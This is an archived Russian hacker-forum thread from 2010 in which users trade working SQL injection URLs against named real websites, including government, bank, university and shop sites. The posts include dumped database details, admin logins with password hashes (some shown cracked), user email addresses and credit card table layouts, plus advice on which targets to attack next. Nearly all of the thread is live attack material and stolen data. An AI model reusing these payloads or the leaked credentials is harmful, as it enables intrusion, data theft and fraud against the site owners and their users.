Форумы на Хакер

Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.

RE: Ваши Sql-инъекции

Пользователи, просматривающие топик: none

Зашли как: Guest

Все форумы >> [Уязвимости] >> RE: Ваши Sql-инъекции

Имя

Сообщение

<< Старые топики Новые топики >>

RE: Ваши Sql-инъекции - 2010-04-21 20:45:50.140000

total90

Сообщений: 15
Оценки: 0
Присоединился: 2009-09-03 19:11:39.676666

http://ihscslnews.org/view_article.php?id=-283+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7 User:ihscslnews@pristina.dreamhost.com
Database:ihscslnews
Version:5.0.89-userstats-log
PR4

http://misto.co.ua./frankivsk/ogoloshennja/ogoloshennja.php?action=show&catid=1+union+select+1,concat_ws(0x3a,user(),database(),version())--

User:dh27shdocka@localhost
Database:doshka
Version:5.1.42-log


 http://tempstuff.murfdesigns.com/art/add_comment.php?art_id=-283+union+select+concat_ws(0x3a,user(),database(),version()),2--

User:murf@eastman.dreamhost.com
Database:murfstuff
Version:5.0.89-userstats-log

Post #: 81

RE: Ваши Sql-инъекции - 2010-04-21 23:13:20.193333

total90

Сообщений: 15
Оценки: 0
Присоединился: 2009-09-03 19:11:39.676666

http://www.mississippipolitical.com/Mississippi/product_desc.php?id=-283+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--

User:Mississippi@208.109.14.20
Database:Mississippi
Version:4.0.27-max-log
PR4

http://www.humus.name/index.php?page=News&ID=-283+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7-- User:slafshas@h12204@s127.loopia.se
Database:humus_name
Version:5.0.45-log
PR4

Post #: 82

RE: Ваши Sql-инъекции - 2010-04-22 08:50:12.786666

Bananas Papaz

Сообщений: 119
Оценки: 0
Присоединился: 2009-11-15 12:46:31.003333

quote:

ORIGINAL: Pashkela

Напоминание-объяснение, почему рекомендуется скули писать именно в скуля , а не через
quote:

скуля
или вообще просто так - так сложнее найти через поиск на сайте, так реже индексируется, так сложнее выявить скулю даже великому гоголю (тем паче хозяину ресурса, с которого хотят получить гешефт), что означает, что скуля дольше проживет и сможет доставить радость большему кол-ву народа. Спасибо за внимание. Планету хекерам.

http://www.google.ru/search?client=opera&rls=ru&q=mississippipolitical.com&sourceid=opera&ie=utf-8&oe=utf-8
Видимо уже не прет…

_http://onlineru.ru/?p=news&id=-1+union+select+1,column_name,3,4,5,6+from+information_schema.columns+where+table_name=char(102,111,114,117,109,95,97,99,99,101,115,115)+limit+0,1--

(ищу название полей в таблице forum_access, нахожу три поля: "userid", "forumid", "accessmask")

_http://onlineru.ru/?p=news&id=-1+union+select+1,userid,3,4,5,6+from+forum_access+limit+0,1-- (теперь пытаюсь узнать содержимое этих полей, а в результате ничего!)

Помогите!!!

Post #: 83

RE: Ваши Sql-инъекции - 2010-04-22 09:59:07.810000

RadikalEdward

Сообщений: 22
Оценки: 0
Присоединился: 2010-04-18 19:46:40.860000

попробуй aes_decrypt(aes_crypt(user_id,0x71),0x71) что то типо этого
может дело в limit+0,1 измени его limit+1,1 limit+2,1 итд

Post #: 84

RE: Ваши Sql-инъекции - 2010-04-22 17:53:15.263333

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

http://www.equitybank.co.ke/service.php?subcat=999+union+select+concat(username,0x3a,psswd,version())+from+users Kiprop.Korir:7cdfa983173cd3233949f84e059f10a0[sm=bg.gif]

Post #: 85

RE: Ваши Sql-инъекции - 2010-04-22 17:57:20.396666

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

https://www.capaus.org/view_news.php?id=-12+union+select+0,1,2,concat%28@@version,0x3a,user%28%29,0x3a,database%28%29,0x3a,@@version_compile_os%29,4--

https://www.capaus.org/view_news.php?id=-12+union+select+0,1,2,concat%28user_name,0x3a,email,0x3a,password%29,4+from+users--

Server: Microsoft-IIS/6.0
Version: 5.0.45-community-nt
Powered by: PHP/4.4.7,PleskWin,ASP.NET
Database: capa_db

Database:
 information_schema
 capa_db
 test
 
 Tables:capa_db
 
 documents
 event_photos
 event_photos_pictures
 events
 mail_tester
 member_specialty
 members
 messages
 news
 send_history
 templates
 users
 
 Columns: members
 
 status
 member_type
 expirationdate
 member_name
 password
 email
 chinese_name
 first_name
 last_name
 address
 address_two
 city
 state
 postcode
 home_phone
 business_phone
 mobile
 upload_picture
 bio
 company
 position
 degree
 undergraduate_school
 undergraduate_major
 undergraduate_year
 graduate_school
 graduate_major
 graduate_year
 create_date
 modification_date
 payment_method
 renew
 renew_type

[sm=br.gif]

Post #: 86

RE: Ваши Sql-инъекции - 2010-04-22 19:55:15.443333

total90

Сообщений: 15
Оценки: 0
Присоединился: 2009-09-03 19:11:39.676666

gov.ua:

http://www.shevruo.da-kyiv.gov.ua/index.php?w=infoarchive&id=-283+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--&search=

User:shevadm@localhost
Database:shevr_ruo
Version:5.1.44

http://www.sobes-ter.gov.ua/index.php?cat=news&id=-283+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12--

User:user@localhost
Database:www
Version:4.1.22-community-nt

Post #: 87

RE: Ваши Sql-инъекции - 2010-04-22 20:31:07.253333

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

http://showatelier.ru/?mod=SiteNews&act=2&news_id=-1+and+1=0+Union+Select+concat%28@@version,0x3a,user%28%29,0x3a,database%28%29,0x3a,@@version_compile_os%29,null--

Server:Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Version: 5.0.89-community
User: showatel_base@localhost
Database: showatel_base1/showatel_base/information_schema


 Database:showatel_base1
 Tables:
 ssp_Account
 ssp_AdminSet Columns: login:PASSWORD
 ssp_Answers
 ssp_Articles
 ssp_ArticlesGoods
 ssp_ArticlesTree
 ssp_ArticlesTreeCache
 ssp_Auth
 ssp_Backup
 ssp_Banner
 ssp_BannerPage
 ssp_BannerSet
 ssp_Catalogs
 ssp_Country
 ssp_CtAccess
 ssp_Curort
 ssp_Designs
 ssp_DesktopsPages
 ssp_DesktopsPagesTree
 ssp_DesktopsPagesTreeCache
 ssp_Discounts
 ssp_FAQ
 ssp_FAQTree
 ssp_FAQTreeCache
 ssp_Files
 ssp_FilesTree
 ssp_FilesTreeCache
 ssp_FormResutls
 ssp_FormResutlsData
 ssp_Goods
 ssp_GoodsPrices
 ssp_GoodsProperties
 ssp_GoodsPropertiesValues
 ssp_GoodsTree
 ssp_GoodsTreeCache
 ssp_Guest
 ssp_GuestDiscount
 ssp_HelpClient
 ssp_Hotel
 ssp_ImageContainer
 ssp_ImageTables
 ssp_ImagesInsideTable
 ssp_Language
 ssp_License
 ssp_Links
 ssp_LinksTree
 ssp_LinksTreeCache
 ssp_Materials
 ssp_MaterialsTree
 ssp_MaterialsTreeCache
 ssp_ModAccess
 ssp_ModuleProperties
 ssp_Modules
 ssp_News
 ssp_NewsArticles
 ssp_NewsComments
 ssp_NewsFiles
 ssp_NewsGoods
 ssp_NewsSend
 ssp_NewsSendGroup
 ssp_NewsSendLink
 ssp_PhotoPages
 ssp_PhotoPagesTree
 ssp_PhotoPagesTreeCache
 ssp_Picts
 ssp_PictsInsideTable
 ssp_Props
 ssp_Questions
 ssp_Realty
 ssp_RealtyFormResutls
 ssp_RealtyFormResutlsData
 ssp_RealtyGuest
 ssp_RealtyPrices
 ssp_RealtyProperties
 ssp_RealtyPropertiesValues
 ssp_RealtyTree
 ssp_RealtyTreeCache
 ssp_RealtyZakaz
 ssp_SiteMailBoxes
 ssp_Spr
 ssp_SprData
 ssp_StatRemoteUsers
 ssp_StatSEKeyWords
 ssp_StatURLCounters
 ssp_Templates
 ssp_TemplatesCache
 ssp_TemplatesReserve
 ssp_TemplatesReserveCache
 ssp_Terms
 ssp_Tour
 ssp_TourApartments
 ssp_TourFoodTypes
 ssp_TourGroup
 ssp_TourGroups
 ssp_TourHotelTypes
 ssp_TourPrice
 ssp_Tour_Zakaz
 ssp_Uploads
 ssp_Valute
 ssp_VotesLog
 ssp_WinFormat
 ssp_Zakaz
 ssp_ZakazGoods
 ssp_ZakazTours

29784de1efce4270df86e42900ebaf2b:aac9d85a21d16d8d1 0d1a105e15d2dc6
cracked[sm=dont.gif] Admin:showatelier.ru:210436046

Post #: 88

RE: Ваши Sql-инъекции - 2010-04-23 10:49:45.140000

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

http://www.greenbergresearch.com/index.php?ID=-999.9 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,%String_Col%,14--

http://www.sytec.com.vn/page.php?type=about&id=-7%20union%20select%201,unhex%28hex%28concat%28user_name,char%2858%29,user_password%29%29%29,3,4,5,6,7,8%20from%20tbl_user--

Post #: 89

RE: Ваши Sql-инъекции - 2010-04-23 10:59:49.993333

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

quote:

ORIGINAL: Alex.Black

http://www.ac-psych.org/index.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database())/*
User: lacp_ac-psych@81.2.203.24
Database: acpsych_ac-psych
Version: 5.0.33-log

quote:

http://www.ac-psych.org/index.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database())/*


 artykuly
 artykuly_test
 artykulyspecial
 artykulyspecial_test
 menu
 menu_nowe
 menu_nowe_anita
 menu_nowe_test
 specialissue
 specialissue_test
 specjalizacje
 subscribe
 subsribe_test
 uploadfile
 uploadfile_test

Post #: 90

RE: Ваши Sql-инъекции - 2010-04-23 15:55:53.120000

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

quote:

ORIGINAL: neesooR

sql - иньекция. на шоп есть ?
пример хочу посмотреть.


 http://www.netmarket.pl/pole/enasp/is.pi.asp?pid=119%20and%281%29=convert%28int,@@version%29--

Server: Microsoft-IIS/6.0
Version: Microsoft SQL Server 2000 - 8.00.2055 (Intel X86)
Dec 16 2008 19:46:53 Copyright © 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Dodatek Service Pack 2)
User: butikcli
Database: butik

Database:
 butik
 master
 tempdb
 model
 msdb
 pubs
 Northwind
 argent
 bkstore
 butik
 
 Tables:butik
 
 Orders
 OrdersPositions
 authkey
 authkey
 authkey
 authkey
 Clients
 clilgn
 cliolgn
 CompView
 dtproperties
 foofoofoo
 onet
 onetpos
 Orders
 OrdersPositions
 Products
 relbutik
 sOrders
 sOrdersPositions
 sysconstraints
 syssegments
 t_jiaozhu
 tbColors
 tbSize
 xtest
 
 Columns: Clients
 CID
 clName
 Email
 Pass
 Tel
 Address
 ZIP
 City
 clDate
 NIP
 Transfer
 Zap
 Login
 Company
 DeliveryAddr
 fname
 emcn
 emnew
 post
 adra
 clpd

Post #: 91

RE: Ваши Sql-инъекции - 2010-04-23 22:57:19.640000

total90

Сообщений: 15
Оценки: 0
Присоединился: 2009-09-03 19:11:39.676666

milegyek.hu
http://www.milegyek.hu/open.php?id=-283+union+select+1,2,3,user(),version(),database(),7,8,9,10,11,12,13,14-- User:saldoweb@localhost
Database:milegyek_hu
Version:5.1.37-1ubuntu5.1
PR5

ukrfoto.dp.ua
http://ukrfoto.dp.ua/download.php?id=283+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version())-- User:saldoweb@localhost
Database:ukrfoto_dp
Version:4.1.25

dnsteel.com.ua
http://dnsteel.com.ua/index.php?id=-283+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9-- User:dnsteel@localhost
Database:dnsteel
Version:5.0.86

Post #: 92

RE: Ваши Sql-инъекции - 2010-04-24 13:30:12.140000

total90

Сообщений: 15
Оценки: 0
Присоединился: 2009-09-03 19:11:39.676666

telspravka.com
http://ustilimsk.telspravka.com/fam.php?id=-283+union+select+1,concat_ws(0x3a,user(),database(),version())-- User: u_telspravka@localhost
Database: telspravka
Version: 4.1.22-log

yp.md

http://www.yp.md/news2/news.php?id=-283+union+Select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13--

User: ypmd_tester@localhost
Database: ypmd_test
Version: 5.0.90-community-log

Post #: 93

RE: Ваши Sql-инъекции - 2010-04-24 18:09:53.160000

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

http://www.socialistworker.co.uk/sw_comment.php?id=4966+union+select+version(),2,3,4/*

Post #: 94

RE: Ваши Sql-инъекции - 2010-04-25 06:28:15.213333

demonru

Сообщений: 1073
Оценки: 0
Присоединился: 2009-02-15 14:18:59.626666

Ну и от меня тогда:


 http://www.designbyjude.com/gallery_detail.php?id=7+and+1=0+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5--
 5.0.51a-3ubuntu5.4:jude@116.240.206.16:designbyjude

Post #: 95

RE: Ваши Sql-инъекции - 2010-04-25 16:54:17.373333

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

а вот и я:

http://www.silkcutlino.com/product_details.php?id=46+and+1=0+Union+Select+1,2,3,4,5,6,concat%28@@version,0x3a,user%28%29,0x3a,database%28%29,0x3a,@@version_compile_os%29,8,9,10,11,12--

Version 5.0.51a-24+lenny2


 Database:shop_silkcutlino_com
 
 Table:
 itemdetails
 orderdetails
 tbl_postage
 tbl_products
 tbl_users
 
 Column: orderdetails
 cart_id
 bname
 baddress
 bcity
 bstate
 bzip
 bcountry
 bphone
 bmobile
 bemail
 heard
 sname
 saddress
 scity
 sstate
 szip
 scountry
 sphone
 smobile
 semail
 sdate
 transaction_no
 cc_number
 cc_name
 cc_type
 cc_expiry
 bank_ref
 responce_text
 responce_code
 settlement_date
 status
 total_price
 ord_status
 payment_mode
 
 Database : shop_silkcutlino_com
 Table: tbl_users

есть и логин:пасс админа но это уже другая история……..

Post #: 96

RE: Ваши Sql-инъекции - 2010-04-26 12:59:08.860000

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

http://yelianghow.com.sg/menu.asp?catID=2&setCourseID=26%20and%281%29=convert%28int,@@version%29--
Server: Microsoft-IIS/6.0
Version: 4.0.20a-nt
User: yelianghow_db_1@orion2.iwi.com.sg
Database: yelianghow_db_1

Post #: 97

RE: Ваши Sql-инъекции - 2010-05-03 10:55:26.610000

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

http://www.tup.edu.ph/news.php?id=-8+union+select+1,2,concat%28@@version,0x3a,user%28%29,0x3a,database%28%29,0x3a,@@version_compile_os%29,0x494E43,5,6,7,8,9,10,11--

Server: Apache/2.0.59 (Win32) PHP/5.2.0
Version: 5.0.27-community-nt
User: root@localhost
Database: tupcms

http://www.tup.edu.ph/news.php?id=-8+union+select+1,2,concat_ws%280x3a,user,password,file_priv%29,0x494E43,5,6,7,8,9,10,11+FROM+mysql.user--

Database : mysql
Table : user
User:Password
root:*928C134CB0407115717358FBC0A03FC76E896FE0

Database:
 
 	information_schema
 	mysql
 	phpmyadmin
 	test
 	tupcms
 	tupwebforum
 
 Tables: tupwebforum
 
 	tupauth_access
 	tupbanlist
 	tupcategories
 	tupconfig
 	tupconfirm
 	tupdisallow
 	tupforum_prune
 	tupforums
 	tupgroups
 	tupposts
 	tupposts_text
 	tupprivmsgs
 	tupprivmsgs_text
 	tupranks
 	tupsearch_results
 	tupsearch_wordlist
 	tupsearch_wordmatch
 	tupsessions
 	tupsessions_keys
 	tupshout
 	tupshoutbox
 	tupsmilies
 	tuptextual_confirmation
 	tupthemes
 	tupthemes_name
 	tuptopics
 	tuptopics_watch
 	tupuser_group
 	tupusers
 	tupvote_desc
 	tupvote_results
 	tupvote_voters
 	tupwords
 
 Column: tupusers
 
 	user_active
 	username
 	user_password
 	user_session_time
 	user_session_page
 	user_lastvisit
 	user_regdate
 	user_level
 	user_posts
 	user_timezone
 	user_style
 	user_lang
 	user_dateformat
 	user_new_privmsg
 	user_unread_privmsg
 	user_last_privmsg
 	user_emailtime
 	user_viewemail
 	user_attachsig
 	user_allowhtml
 	user_allowbbcode
 	user_allowsmile
 	user_allowavatar
 	user_allow_pm
 	user_allow_viewonline
 	user_notify
 	user_notify_pm
 	user_popup_pm
 	user_rank
 	user_avatar
 	user_avatar_type
 	user_email
 	user_icq
 	user_website
 	user_from
 	user_sig
 	user_sig_bbcode_uid
 	user_aim
 	user_yim
 	user_msnm
 	user_occ
 	user_interests
 	user_actkey
 	user_newpasswd
 	user_login_tries
 	user_last_login_try

Table : tupusers
 username:user_password:user_email
 webadmin:3adfb823b6e672d5e26a899f1adf099e:ccccc@yahoo.com 
 [b]Сracked: 3adfb823b6e672d5e26a899f1adf099e:341651[/b]
 the KG:0d7b9a697697567f2afb00cdba129355:krisgeneral@ya hoo.com
 Fprosario:cd1b50533bb70b5cb49e8a54d3d39933:mah_bab y_ellaine_and_cyndi@yahoo.com
 angecarlsison:937c52d94b43e5c3fafc48be43d15cdc:ang ecarlsison@yahoo.com
 R.Tanala:e62d69123e9c6126bdcddb612d1ec74f:tanala_r izza@yahoo.com
 tidehunter:111132ae44e75c3eae89127061a78b34:rperal ta_0414@yahoo.com
 ayhie29:d8344905e23da5b9374733e882c4867e:armarceli no29@yahoo.com
 shook2kill:351f3a4b1a413bdb69070cf21955740f:shook2 kill@yahoo.com
 ennario:14d1bc92479bbd560362b9709e3689e4:great_lov er26@yahoo.com 
 Всего 1460

Post #: 98

RE: Ваши Sql-инъекции - 2010-05-04 10:57:00.236666

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

http://www.blogforacure.com/frontend/calendars/event.php?event_id=null%20UNION%20SELECT%201,2,3,4,5,6,0x494E43,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,9,10,11,12,13,14,15,16,17--

blogforacure2@localhost : blogforacure2 : 4.1.20

Post #: 99

RE: Ваши Sql-инъекции - 2010-05-05 08:58:50.430000

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

http://www.frentanarent.it/sezioni.php?titolo=news&id=-1+union+select+1,concat_ws%280x3a,user,psw%29,3,4,5,6+from+admin--

novatekservices:8969b7ea1adcc630297ea9280bb01fdb

http://www.frentanarent.it/admin.php
Database : frentanarent
Table : admin
user:psw:email:
novatekservices:8969b7ea1adcc630297ea9280bb01fdb:i nfo@nova-tek.it
admin:87811474a57f9e2edf03c76155c4ba57:frentana.re nt@virgilio.it

Post #: 100

RE: Ваши Sql-инъекции - 2010-05-06 19:43:25.886666

reigan

Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666

http://www.nbg.gov.ge/index.php?m=339&year=2001'+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(

0)*2))+from+information_schema.tables+group+by+2)a)–+

а как составить запрос что бы просмотреть column_name ?

Post #: 101

RE: Ваши Sql-инъекции - 2010-05-07 06:27:35.126666

reigan

Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666

Post #: 102

RE: Ваши Sql-инъекции - 2010-05-11 23:33:55.583333

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

http://www.fiacona.org/category_index.php?catid=-95%27+union+select+1,2,concat_ws%280x3a,table_name,column_name%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns--%20and%20%271%27=%272

5.0.89-community

http://www.detachmenttheory.com/e107_plugins/image_gallery/image_gallery.php?page=image-detail&amp;album=1&amp;image=-9999+UNION+SELECT+concat_ws%28char%2858%29,user_name,user_password%29+from+e107_user+where+user_id=1--


 [link=http://lapaz.gob.mx/sistema/mostrar/uploads/upload.php?id=-1/**/UNION/**/SELECT/**/NULL,0,concat_ws%280x3a,login,password%29,1,2,3/**/FROM/**/usuarios/**/limit/**/0,1--]http://lapaz.gob.mx/sistema/mostrar/uploads/upload.php?id=-1/**/UNION/**/SELECT/**/NULL,0,concat_ws%280x3a,login,password%29,1,2,3/**/FROM/**/usuarios/**/limit/**/0,1--[/link]

Десерт[sm=bq.gif]

http://www.magicsphere.net/?page=23&amp;menu=1&amp;id=-76+union+select+concat_ws%28username,user_password,user_email%29,2,3+from+phpbb_users--

Server = Apache/2.2.X (OVH)
Version = 4.0.26-standard-log
Powered by = PHP/4.4.9
User = magicsphcartes@10.0.62.30
Database = magicsphcartes

Tables:phpbb_users
phpbb_users
Columns: Table phpbb_users
username
user_email
user_icq
user_id
user_level
user_password

Post #: 103

RE: Ваши Sql-инъекции - 2010-05-12 10:04:35.580000

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

http://www.sillybillies.com.au/page.php?id=-14%20union%20all%20select%201,2,concat_ws%280x2B,username,password%20%29,4%20from%20settings--

http://www.rockiurbanfitness.com.au/trainers.php?id=-8+union+select+0,1,2,3,concat_ws%280x3a,fname,lname,pwd%29+from+trainers--

спец. для шопоголиков[sm=dont.gif]

http://www.wordwellbooks.com/book.php?id=-394+union+select+1,2,3,5,4,Credit_Card_Number,7,8,9,concat_ws%28Credit_Card_Type,Exp_Month,Exp_Year%29,11,12,13,14,15+from+Orders--


 Database:wwbooksdb
 
 information_schema
 wwbooksdb
 
 Tables:Orders
 Orders
 Publishers
 _sessions
 _users
 test
 
 Columns: Table Orders
 __owner_id
 __ctime
 __mtime
 __md5
 Salutation
 First_Name
 Middle_Initial
 Last_Name
 eMail_Address
 Street_Address
 CityTown
 StateCounty
 Zip
 Country
 Daytime_Phone
 Evening_Phone
 Daytime_Fax
 Evening_Fax
 Credit_Card_Type
 Exp_Month
 Exp_Year
 Credit_Card_Number
 Order_ID
 Total
 Products_Ordered
 Status
 Shipping
 Shipping_Method
 Tax
 DeliveryStreet_Address
 DeliveryCityTown
 DeliveryStateCounty
 DeliveryZip
 DeliveryCountry
 DeliverySalutation
 DeliveryFirst_Name
 DeliveryMiddle_Initial
 DeliveryLast_Name
 DeliveryPhone

…и ещё один подарок шопоголикам


 https://www.rucksack-center.de/shop/index.php?static=modules/shop/templates/misc/show_detail_image.html&clean=yes&title=cowgirl&nummer=-000
 
 
 [b]Host IP:		85.13.156.142
 Web Server: 	Apache
 Powered-by: 	Contentpapst 3.5.0
 DB Server: 	MySQL &gt;=5
 Current DB: 	v129429
 Data Bases: 	information_schema
 		        v129429[/b]

Post #: 104

RE: Ваши Sql-инъекции - 2010-05-13 09:14:16.556666

reigan

Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666

http://www.wordwellbooks.com офигенный шоп прям , актуальный картон за 2002 год , супер,нафиг такую чушь выкладывать?

Post #: 105

RE: Ваши Sql-инъекции - 2010-05-13 11:34:08.486666

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

quote:

ORIGINAL: reigan

http://www.wordwellbooks.com офигенный шоп прям , актуальный картон за 2002 год , супер,нафиг такую чушь выкладывать?

[sm=offtopic.gif][sm=poster_ban.gif]

ну а теперь по теме:

http://www.sillybillies.com.au/page.php?id=-14%20union%20all%20select%201,2,concat_ws%280x2B,username,password%20%29,4%20from%20settings--


 http://www.rockiurbanfitness.com.au/trainers.php?id=-8+union+select+0,1,2,3,concat_ws%280x3a,fname,lname,pwd%29+from+trainers--


 http://www.phpstreet.com/winxp.php?id=-1+union+select+0,concat_ws%280x3a,gid,gname,gpwd,gmail%29,2+from+sp_gbook--


 http://ytuongdesign.com.vn/index.php?m=product&act=detail&pid=7&id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws%280x3a,user_id,user_password%29,14+from+tbl_user--

Post #: 106

RE: Ваши Sql-инъекции - 2010-05-13 15:09:08.570000

reigan

Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666

В этих сайта полезной информации никакой(((((

Post #: 107

RE: Ваши Sql-инъекции - 2010-05-13 15:12:14.290000

reigan

Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666

Кому может нужно будет. Некоторые не мои.
http://www.fowlgreenfarm.co.uk/seeanddo_detail.php?id=3+and+1=0+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+limit+25,2–
http://www.fowlgreenfarm.co.uk/seeanddo_detail.php?id=3+and+1=0+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information.columns+where+table_name=0x7573657273
http://www.fowlgreenfarm.co.uk/seeanddo_detail.php?id=3+and+1=0+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=0x7573657273
http://www.fowlgreenfarm.co.uk/seeanddo_detail.php?id=3+and+1=0+union+select+1,concat_ws(0x3a,firstname,surname,email,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users–
http://www.fowlgreenfarm.co.uk/seeanddo_detail.php?id=3+and+1=0+union+select+1,concat_ws(0x3a,firstname,surname,email,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users–
http://gambia.gtbank.com/news.php?id=7+and+1=0+union+select+1,concat_ws(0x3a,id,username,password),3,4,5+from+users–
банк c5343eb49c26d286670bb0a44604d67b = tre$pass
http://www.nbg.gov.ge/index.php?m=339&year=2001'+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)–+
http://www.hibbett.com/categories.php?id=7+and+1=0+union+select+1,2,3,4,5,table_name+from+information_schema.tables–
http://www.globalideasbank.org/site/store/detail.php?articleId=43+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)–+
http://www.globalideasbank.org/site/store/detail.php?articleId=43+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+53,1),floor(rand(%20%20%200)*2))+from+information_schema.tables+group+by+2)a)–+
http://www.pc-shop.kz/index.php?c_id=usb-flash'+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)–+
http://www.rucksack-center.de/shop/index.php?static=modules/shop/templates/misc/show_detail_image.html&clean=yes&title=cowgirl&nummer=-1{SQLINJ}
http://www.pc-shop.kz/index.php?c_id=usb-flash'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)–+

http://shop.megabug.co.uk/products.php?cat=96+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+21,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)–+

http://www.fiacona.org/category_index.php?catid=-95%27+union+select+1,2,concat_ws%280x3a,table_name,column_name%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns–%20and%20%271%27=%272

Post #: 108

RE: Ваши Sql-инъекции - 2010-05-13 15:14:17.726666

reigan

Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666

http://www.kcell.kz/ru/?l=archiv&a=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+ws_activv%00

http://www.kcell.kz/ru/?l=archiv&a=show&id=-1+union+select+1,2,3,4,5,%20%20%206,7,8,9,10+from+services.asp

http://crystalclub.kz/items/?id=1+order+by+5/*

кто раскрутит ? поделетись инфой)))))))

Post #: 109

RE: Ваши Sql-инъекции - 2010-05-13 16:17:04.193333

Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000


 http://crystalclub.kz/items/?id=@@version

Больше там ничего особенного не сделаешь, т.к. GET-запрос обрезается (ограничение по длине)

Post #: 110

RE: Ваши Sql-инъекции - 2010-05-13 16:31:39.390000

reigan

Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666

мне больше интерисует это сайт http://www.kcell.kz/ru/?l=archiv&a=show&id=-1+union+select+1,2,3,4,5,%20%20%206,7,8,9,10+from+services.asp

Post #: 111

RE: Ваши Sql-инъекции - 2010-05-13 16:37:16.920000

Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000

quote:

ORIGINAL: reigan

мне больше интерисует это сайт http://www.kcell.kz/ru/?l=archiv&a=show&id=-1+union+select+1,2,3,4,5,%20%20%206,7,8,9,10+from+services.asp

как бы понятно:

quote:

GSM Казахстан/Kcell входит в состав крупнейшего скандинавского телекоммуникационного холдинга TeliaSonera, 49% компании принадлежит АО "Казахтелеком".

Лучше сразу МТС или Билайн попробуй

Post #: 112

RE: Ваши Sql-инъекции - 2010-05-14 15:03:24.153333

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

http://www.sisonlgu.gov.ph/announce.php?id=-999.9 UNION ALL SELECT 1,%String_Col%,3,4--
2reigan, может хватит флудить и посты набивать. Сам ставишь чёрти что и на других бочку катишь…


 Target: 		http://www.kcell.kz/ru/?l=archiv&a=show&id=-1
 Host IP:		195.47.255.122
 Web Server: 	Microsoft-IIS/6.0
 Powered-by: 	ASP.NET
 DB Server: 	MSAccess
 Web Root: 	c:\windows\system32\inetsrv\
 Drive: 		a: (Drive error! maybe it's CD-ROM)
 		c:
 		d: (Drive error! maybe it's CD-ROM)

Post #: 113

RE: Ваши Sql-инъекции - 2010-05-15 11:57:51.153333

reigan

